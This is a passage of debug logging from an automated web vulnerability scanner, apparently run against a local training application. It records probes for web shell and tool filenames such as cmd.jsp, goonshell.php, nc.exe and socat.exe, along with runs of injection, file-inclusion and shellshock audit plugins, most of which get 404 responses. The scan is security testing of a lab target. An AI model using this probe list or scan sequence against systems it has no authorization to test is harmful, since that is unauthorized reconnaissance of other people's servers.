http://localhost:9090/cmd.GPL returned HTTP code "404" (id=489,from_cache=0,grep=1,rtt=0.16,did=AP0BEiDl) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/ntdaddy.asp returned HTTP code "404" (id=492,from_cache=0,grep=1,rtt=0.25,did=CfZKMhff) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/rhtools.mspx returned HTTP code "404" (id=493,from_cache=0,grep=1,rtt=0.36,did=z1hWZmFl) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/netcat.exe returned HTTP code "404" (id=495,from_cache=0,grep=1,rtt=0.04,did=vua1fQgw) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/shell.js returned HTTP code "404" (id=498,from_cache=0,grep=1,rtt=0.34,did=EiCd3Sqh) [Wed Feb 12 09:36:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 19. [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/cmd.nsf returned HTTP code "404" (id=494,from_cache=0,grep=1,rtt=0.12,did=QHxZ6a6x) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/kacak.mspx returned HTTP code "404" (id=499,from_cache=0,grep=1,rtt=0.02,did=0JcXpSzy) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/shell.GPL returned HTTP code "404" (id=496,from_cache=0,grep=1,rtt=0.14,did=Y6v4qNR6) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/up.sh returned HTTP code "404" (id=491,from_cache=0,grep=1,rtt=0.15,did=Haxv8Jo4) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/aspydrv.aspx returned HTTP code "404" (id=497,from_cache=0,grep=1,rtt=0.35,did=m23OnJKR) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/shell.py returned HTTP code "404" (id=502,from_cache=0,grep=1,rtt=0.20,did=D4iQcS4w) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/cmd.sh returned HTTP code "404" (id=504,from_cache=0,grep=1,rtt=0.05,did=3jsQdaCB) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/cmd.py returned HTTP code "404" (id=501,from_cache=0,grep=1,rtt=0.20,did=Dbli1GTB) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/exploit.c returned HTTP code "404" (id=503,from_cache=0,grep=1,rtt=0.26,did=S2u4zjpM) [Wed Feb 12 09:36:36 2020 - debug] PROPPATCH http://localhost:9090/ returned HTTP code "404" (id=505,from_cache=0,grep=1,rtt=0.08,did=LGn0pIQB) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/kshell.mspx returned HTTP code "404" (id=500,from_cache=0,grep=1,rtt=0.21,did=tEg1CP6c) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=506,from_cache=1,grep=1,rtt=0.18,did=xdCMZZ5r) [Wed Feb 12 09:36:36 2020 - debug] wordpress_fullpathdisclosure.discover(did="P20Zanwu",uri="http://localhost:9090/") took 1.57s to run [Wed Feb 12 09:36:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 20. [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/cmd.pl returned HTTP code "404" (id=507,from_cache=1,grep=1,rtt=0.19,did=RhTViC0c) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/portal/page returned HTTP code "404" (id=510,from_cache=0,grep=1,rtt=0.17,did=OCSE1Nsn) [Wed Feb 12 09:36:36 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:36 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:PZDJadGq) [Wed Feb 12 09:36:37 2020 - debug] GET http://localhost:9090/reports/rwservlet/showenv returned HTTP code "404" (id=511,from_cache=0,grep=1,rtt=0.11,did=GfynDQoB) [Wed Feb 12 09:36:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 309, 'reject-seen-url': 50, 'reject-out-of-scope': 5, 'accept': 61} [Wed Feb 12 09:36:37 2020 - debug] rfi.audit(did="PZDJadGq",uri="http://localhost:9090/learn") took 0.69s to run [Wed Feb 12 09:36:37 2020 - debug] GET http://localhost:9090/cmdjsp.jspx returned HTTP code "404" (id=508,from_cache=0,grep=1,rtt=0.04,did=QyEaLopY) [Wed Feb 12 09:36:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 309, 'reject-seen-url': 50, 'reject-out-of-scope': 5, 'accept': 61} [Wed Feb 12 09:36:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 21. [Wed Feb 12 09:36:37 2020 - debug] GET http://localhost:9090/ListServlet returned HTTP code "404" (id=509,from_cache=0,grep=1,rtt=0.08,did=zSKcU93J) [Wed Feb 12 09:36:37 2020 - debug] Will increase timeout to 3.30 seconds after HTTP socket error (did:OgRVyRFG) [Wed Feb 12 09:36:37 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.30 seconds [Wed Feb 12 09:36:37 2020 - debug] Raising HTTP error "DEBUG" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:OgRVyRFG). [Wed Feb 12 09:36:37 2020 - debug] phishtank.discover(http://localhost:9090/, did=oGBZG4EY) [Wed Feb 12 09:36:37 2020 - debug] [phishtank] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:37 2020 - debug] DNS response from DNS server for domain: localhost [Wed Feb 12 09:36:37 2020 - debug] GET http://localhost:9090/goonshell.php returned HTTP code "404" (id=400,from_cache=0,grep=1,rtt=0.23,did=EC04Yves) [Wed Feb 12 09:36:37 2020 - debug] GET http://localhost:9090/cmd.jspx returned HTTP code "404" (id=512,from_cache=0,grep=0,rtt=0.44,did=28XnT3Tn) [Wed Feb 12 09:36:37 2020 - debug] GET http://localhost:9090/cmdasp.aspx returned HTTP code "404" (id=514,from_cache=0,grep=1,rtt=0.06,did=UfNDatwC) [Wed Feb 12 09:36:37 2020 - debug] GET http://localhost:9090/shell.do returned HTTP code "404" (id=515,from_cache=0,grep=1,rtt=0.13,did=xSwfxtVV) [Wed Feb 12 09:36:37 2020 - debug] GET http://localhost:9090/?WSDL= returned HTTP code "302" (id=516,from_cache=0,grep=1,rtt=0.30,did=mXZnkJZ5) [Wed Feb 12 09:36:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 22. [Wed Feb 12 09:36:37 2020 - debug] file_upload.audit(did="isQewwIh", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:37 2020 - debug] file_upload.audit(did="isQewwIh",uri="http://localhost:9090/cmd.jspx") took 0.00s to run [Wed Feb 12 09:36:38 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=519,from_cache=0,grep=0,rtt=0.44,did=QVLGzKv1) [Wed Feb 12 09:36:38 2020 - debug] GET http://localhost:9090/?wsdl= returned HTTP code "302" (id=517,from_cache=0,grep=1,rtt=0.27,did=7ycMTfx1) [Wed Feb 12 09:36:38 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 23. [Wed Feb 12 09:36:38 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 24. [Wed Feb 12 09:36:38 2020 - debug] GET http://localhost:9090/ntdaddy.mspx returned HTTP code "404" (id=518,from_cache=0,grep=1,rtt=0.08,did=6WNhRMk7) [Wed Feb 12 09:36:38 2020 - debug] GET http://localhost:9090/_notes/dwsync.xml returned HTTP code "404" (id=513,from_cache=0,grep=1,rtt=0.16,did=CmyIUfSz) [Wed Feb 12 09:36:38 2020 - debug] GET http://localhost:9090/cmd.do returned HTTP code "404" (id=520,from_cache=0,grep=1,rtt=0.30,did=4jEsXBjm) [Wed Feb 12 09:36:38 2020 - debug] Will increase timeout to 3.63 seconds after HTTP socket error (did:kNJTZkYe) [Wed Feb 12 09:36:38 2020 - debug] Updating socket timeout for localhost from 3.30 to 3.63 seconds [Wed Feb 12 09:36:38 2020 - debug] Raising HTTP error "VERSION_CONTROL" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:kNJTZkYe). [Wed Feb 12 09:36:38 2020 - debug] GET http://localhost:9090/cmd.d2w returned HTTP code "404" (id=521,from_cache=0,grep=1,rtt=0.10,did=mmrSYyZa) [Wed Feb 12 09:36:38 2020 - debug] csrf.audit(did="ibLeJC9D", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:38 2020 - debug] csrf.audit(did="ibLeJC9D",uri="http://localhost:9090/cmd.jspx") took 0.00s to run [Wed Feb 12 09:36:38 2020 - debug] localhost:9090 connection pool stats (free:49 / in_use:0 / max:50 / total:49) [Wed Feb 12 09:36:38 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:36:38 2020 - debug] GET http://localhost:9090/shell.asp returned HTTP code "404" (id=522,from_cache=0,grep=1,rtt=0.20,did=wryy1XjX) [Wed Feb 12 09:36:38 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 25. [Wed Feb 12 09:36:38 2020 - debug] deserialization.audit(did="QOpBe9s9", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:38 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:38 2020 - debug] deserialization.audit(did="QOpBe9s9",uri="http://localhost:9090/cmd.jspx") took 0.01s to run [Wed Feb 12 09:36:38 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=523,from_cache=0,grep=1,rtt=0.19,did=gieLmh8d) [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=525,from_cache=0,grep=0,rtt=0.10,did=QVLGzKv1) [Wed Feb 12 09:36:39 2020 - debug] os_commanding.audit(did="udn42CsB", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:udn42CsB) [Wed Feb 12 09:36:39 2020 - debug] cors_origin.audit(did="gieLmh8d",uri="http://localhost:9090/learn") took 3.11s to run (0.39s 12% sending HTTP requests) [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/shell.show returned HTTP code "404" (id=524,from_cache=0,grep=1,rtt=0.25,did=MYDi9RJ3) [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] os_commanding.audit(did="udn42CsB",uri="http://localhost:9090/cmd.jspx") took 0.10s to run [Wed Feb 12 09:36:39 2020 - debug] lfi.audit(did="SfLfU2s7", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:SfLfU2s7) [Wed Feb 12 09:36:39 2020 - debug] sqli.audit(did="bo496qbK", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:bo496qbK) [Wed Feb 12 09:36:39 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:36:39 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: yH9YRVsV) [Wed Feb 12 09:36:39 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 26. [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/cfexec.cfm returned HTTP code "404" (id=527,from_cache=0,grep=1,rtt=0.13,did=umSasOir) [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/shell.d2w returned HTTP code "404" (id=528,from_cache=0,grep=1,rtt=0.10,did=StBAkF9G) [Wed Feb 12 09:36:39 2020 - debug] sqli.audit(did="bo496qbK",uri="http://localhost:9090/cmd.jspx") took 0.06s to run [Wed Feb 12 09:36:39 2020 - debug] blind_sqli.audit(did="oxVMavar", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] POST http://localhost:9090/ returned HTTP code "404" (id=529,from_cache=0,grep=1,rtt=0.12,did=PWQMDJ5P) [Wed Feb 12 09:36:39 2020 - debug] lfi.audit(did="SfLfU2s7",uri="http://localhost:9090/cmd.jspx") took 0.14s to run [Wed Feb 12 09:36:39 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 27. [Wed Feb 12 09:36:39 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=71 returned HTTP code "200" (id=526,from_cache=0,grep=0,rtt=0.66,did=Jt31DyXm) [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] phishing_vector.audit(did="QIaXv8iv", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] blind_sqli.audit(did="oxVMavar",uri="http://localhost:9090/cmd.jspx") took 0.16s to run [Wed Feb 12 09:36:39 2020 - debug] generic.audit(did="FNvdCt3l", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 28. [Wed Feb 12 09:36:39 2020 - debug] generic.audit(did="FNvdCt3l",uri="http://localhost:9090/cmd.jspx") took 0.02s to run [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=530,from_cache=0,grep=0,rtt=0.12,did=QVLGzKv1) [Wed Feb 12 09:36:39 2020 - debug] Returning cached average RTT of 0.22 seconds for mutant 39394de6ba9bfc4a7ad64ef897ce62ec [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:QIaXv8iv) [Wed Feb 12 09:36:39 2020 - debug] Returning fresh average RTT of 0.22 seconds for mutant 39394de6ba9bfc4a7ad64ef897ce62ec [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=531,from_cache=0,grep=0,rtt=0.13,did=yH9YRVsV) [Wed Feb 12 09:36:39 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: yH9YRVsV) [Wed Feb 12 09:36:39 2020 - debug] detailed._login() took 0.28s to run [Wed Feb 12 09:36:39 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 29. [Wed Feb 12 09:36:39 2020 - debug] format_string.audit(did="Wvt2yZcH", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Wvt2yZcH) [Wed Feb 12 09:36:39 2020 - debug] format_string.audit(did="Wvt2yZcH",uri="http://localhost:9090/cmd.jspx") took 0.02s to run [Wed Feb 12 09:36:39 2020 - debug] Finished audit.phishing_vector (did=QIaXv8iv) [Wed Feb 12 09:36:39 2020 - debug] phishing_vector.audit(did="QIaXv8iv",uri="http://localhost:9090/cmd.jspx") took 0.13s to run [Wed Feb 12 09:36:39 2020 - debug] COPY http://localhost:9090/ returned HTTP code "404" (id=533,from_cache=0,grep=1,rtt=0.11,did=pljQtDJz) [Wed Feb 12 09:36:39 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 30. [Wed Feb 12 09:36:39 2020 - debug] websocket_hijacking.audit(did="hV9YDgHk", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] shell_shock.audit(did="angK7cDm", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/socat.exe returned HTTP code "404" (id=532,from_cache=0,grep=1,rtt=0.20,did=h6totNaw) [Wed Feb 12 09:36:39 2020 - debug] websocket_hijacking.audit(did="hV9YDgHk",uri="http://localhost:9090/cmd.jspx") took 0.05s to run [Wed Feb 12 09:36:39 2020 - debug] memcachei.audit(did="kxjFKRbs", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:kxjFKRbs) [Wed Feb 12 09:36:39 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 31. [Wed Feb 12 09:36:39 2020 - debug] oracle_discovery found the URL: "http://localhost:9090/portal/page" but failed to parse it as an Oracle page. The first 50 bytes of the response body is: "\n\n\n, response wait time was: 0.158929109573 seconds and response ID: 536. [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/list.sh returned HTTP code "404" (id=534,from_cache=0,grep=1,rtt=0.06,did=ktomJtyh) [Wed Feb 12 09:36:39 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 321, 'reject-seen-url': 54, 'reject-out-of-scope': 5, 'accept': 70} [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/nc.exe returned HTTP code "404" (id=537,from_cache=0,grep=1,rtt=0.08,did=b30vPc8s) [Wed Feb 12 09:36:39 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 33. [Wed Feb 12 09:36:39 2020 - debug] memcachei.audit(did="kxjFKRbs",uri="http://localhost:9090/cmd.jspx") took 0.28s to run [Wed Feb 12 09:36:39 2020 - debug] buffer_overflow.audit(did="zGIc4erQ", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:39 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jspx" () [Wed Feb 12 09:36:39 2020 - debug] GET http://localhost:9090/cmd.show returned HTTP code "404" (id=539,from_cache=0,grep=1,rtt=0.07,did=dyQeIDou) [Wed Feb 12 09:36:39 2020 - debug] ldapi.audit(did="n5qCKITZ",uri="http://localhost:9090/cmd.jspx") took 0.10s to run [Wed Feb 12 09:36:39 2020 - debug] Starting the phishtank CSV parsing. [Wed Feb 12 09:36:39 2020 - debug] redos.audit(did="V3vthuAS", uri="http://localhost:9090/cmd.jspx") [Wed Feb 12 09:36:40 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=538,from_cache=0,grep=1,rtt=0.07,did=QVLGzKv1) [Wed Feb 12 09:36:40 2020 - debug] [id: 140100622156944] HTTP response delay was 0.07. (lower, expected, upper): 8.00, 8.00, 16.28. [Wed Feb 12 09:36:40 2020 - debug] [did: QVLGzKv1] [id: 140100622156944] Failed to control HTTP response delay for URL http://localhost:9090/learn - parameter "User-Agent" for 8 seconds using , response wait time was: 0.0688080787659 seconds and response ID: 538. [Wed Feb 12 09:36:40 2020 - debug] GET http://localhost:9090/cmd.jspx returned HTTP code "404" (id=541,from_cache=0,grep=1,rtt=0.20,did=angK7cDm) [Wed Feb 12 09:36:40 2020 - debug] shell_shock.audit(did="QVLGzKv1",uri="http://localhost:9090/learn") took 4.64s to run (1.09s 23% sending HTTP requests) [Wed Feb 12 09:36:40 2020 - debug] buffer_overflow.audit(did="zGIc4erQ",uri="http://localhost:9090/cmd.jspx") took 0.08s to run [Wed Feb 12 09:36:40 2020 - debug] oracle_discovery found the URL: "http://localhost:9090/reports/rwservlet/showenv" but failed to parse it as an Oracle page. The first 50 bytes of the response body is: "\n\n\n, response wait time was: 0.0679519176483 seconds and response ID: 555. [Wed Feb 12 09:36:41 2020 - debug] GET http://localhost:9090/cmd.jspx returned HTTP code "404" (id=556,from_cache=0,grep=1,rtt=0.07,did=angK7cDm) [Wed Feb 12 09:36:41 2020 - debug] [id: 140100635561680] HTTP response delay was 0.07. (lower, expected, upper): 8.00, 8.00, 16.19. [Wed Feb 12 09:36:41 2020 - debug] [did: angK7cDm] [id: 140100635561680] Failed to control HTTP response delay for URL http://localhost:9090/cmd.jspx - parameter "User-Agent" for 8 seconds using , response wait time was: 0.0658228397369 seconds and response ID: 556. [Wed Feb 12 09:36:41 2020 - debug] shell_shock.audit(did="angK7cDm",uri="http://localhost:9090/cmd.jspx") took 1.59s to run (0.80s 49% sending HTTP requests) [Wed Feb 12 09:36:41 2020 - debug] rfi.audit(did="WVfrQ5Su",uri="http://localhost:9090/cmd.jspx") took 0.32s to run [Wed Feb 12 09:36:41 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=557,from_cache=0,grep=0,rtt=0.11,did=CSheJxFr) [Wed Feb 12 09:36:41 2020 - debug] file_upload.audit(did="QQoctTFn", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:41 2020 - debug] file_upload.audit(did="QQoctTFn",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:41 2020 - debug] finger_pks.discover(http://localhost:9090/learn, did=4NU0ecSk) [Wed Feb 12 09:36:41 2020 - debug] The infrastructure plugin: "finger_pks" wont be run anymore. [Wed Feb 12 09:36:41 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:41 2020 - debug] Calling finger_pks.end() [Wed Feb 12 09:36:41 2020 - debug] Spent 0.00 seconds running finger_pks.end() [Wed Feb 12 09:36:41 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:41 2020 - debug] finger_pks.discover(did="4NU0ecSk",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:41 2020 - debug] The infrastructure plugin: "finger_bing" wont be run anymore. [Wed Feb 12 09:36:41 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:41 2020 - debug] Calling finger_bing.end() [Wed Feb 12 09:36:41 2020 - debug] Spent 0.00 seconds running finger_bing.end() [Wed Feb 12 09:36:41 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:41 2020 - debug] finger_bing.discover(did="DuVoLm7N",uri="http://localhost:9090/learn") took 0.04s to run [Wed Feb 12 09:36:41 2020 - debug] genexus_xml.discover(http://localhost:9090/learn, did=2D4lyiYl) [Wed Feb 12 09:36:41 2020 - debug] [genexus_xml] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:41 2020 - debug] The crawl plugin: "genexus_xml" wont be run anymore. [Wed Feb 12 09:36:41 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:41 2020 - debug] Calling genexus_xml.end() [Wed Feb 12 09:36:41 2020 - debug] Spent 0.00 seconds running genexus_xml.end() [Wed Feb 12 09:36:41 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:41 2020 - debug] genexus_xml.discover(did="2D4lyiYl",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] UNSUBSCRIBE http://localhost:9090/ returned HTTP code "404" (id=558,from_cache=0,grep=1,rtt=0.15,did=aIGLWp8R) [Wed Feb 12 09:36:42 2020 - debug] wordpress_fingerprint.discover(http://localhost:9090/learn, did=WqNZdGWv) [Wed Feb 12 09:36:42 2020 - debug] [wordpress_fingerprint] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] csrf.audit(did="GsTbALrF", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] csrf.audit(did="GsTbALrF",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] deserialization.audit(did="uHzKHuOA", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] deserialization.audit(did="uHzKHuOA",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] os_commanding.audit(did="mDrkeGin", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:mDrkeGin) [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] os_commanding.audit(did="mDrkeGin",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] dot_listing.discover(http://localhost:9090/learn, did=A45v3S1j) [Wed Feb 12 09:36:42 2020 - debug] [dot_listing] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] lfi.audit(did="krRQ36yc", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:krRQ36yc) [Wed Feb 12 09:36:42 2020 - debug] lfi.audit(did="krRQ36yc",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] Will increase timeout to 3.99 seconds after HTTP socket error (did:W04MBuJP) [Wed Feb 12 09:36:42 2020 - debug] Updating socket timeout for localhost from 3.63 to 3.99 seconds [Wed Feb 12 09:36:42 2020 - debug] Raising HTTP error "TEXTSEARCH" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:W04MBuJP). [Wed Feb 12 09:36:42 2020 - debug] sqli.audit(did="rlyUlsYL", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:rlyUlsYL) [Wed Feb 12 09:36:42 2020 - debug] sqli.audit(did="rlyUlsYL",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] dot_listing.discover(did="A45v3S1j",uri="http://localhost:9090/learn") took 0.04s to run [Wed Feb 12 09:36:42 2020 - debug] content_negotiation.discover(http://localhost:9090/learn, did=dTu1ShAb) [Wed Feb 12 09:36:42 2020 - debug] [content_negotiation] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:42 2020 - debug] blind_sqli.audit(did="qsWshM0n", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] blind_sqli.audit(did="qsWshM0n",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] phishing_vector.audit(did="LkB6rnPC", uri="http://localhost:9090/cmd.jsp") [Wed Feb 12 09:36:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/cmd.jsp" () [Wed Feb 12 09:36:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:LkB6rnPC) [Wed Feb 12 09:36:42 2020 - debug] Finished audit.phishing_vector (did=LkB6rnPC) [Wed Feb 12 09:36:42 2020 - debug] phishing_vector.audit(did="LkB6rnPC",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:42 2020 - debug] generic.audit(did="foWf3wWD", 